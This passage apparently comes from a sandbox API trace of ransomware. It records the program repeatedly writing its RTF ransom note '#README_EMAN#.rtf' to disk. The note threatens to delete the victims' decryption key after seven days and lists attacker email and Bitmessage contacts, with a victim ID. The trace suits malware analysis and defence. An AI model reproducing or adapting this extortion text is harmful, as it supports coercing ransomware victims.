ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.767] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2460da8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0269.768] WriteFile (in: hFile=0x284, lpBuffer=0x2460da8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2460da8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.768] CloseHandle (hObject=0x284) returned 1 [0269.768] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\#readme_eman#.rtf")) returned 0xffffffff [0269.768] GetLastError () returned 0x2 [0269.768] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.776] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO 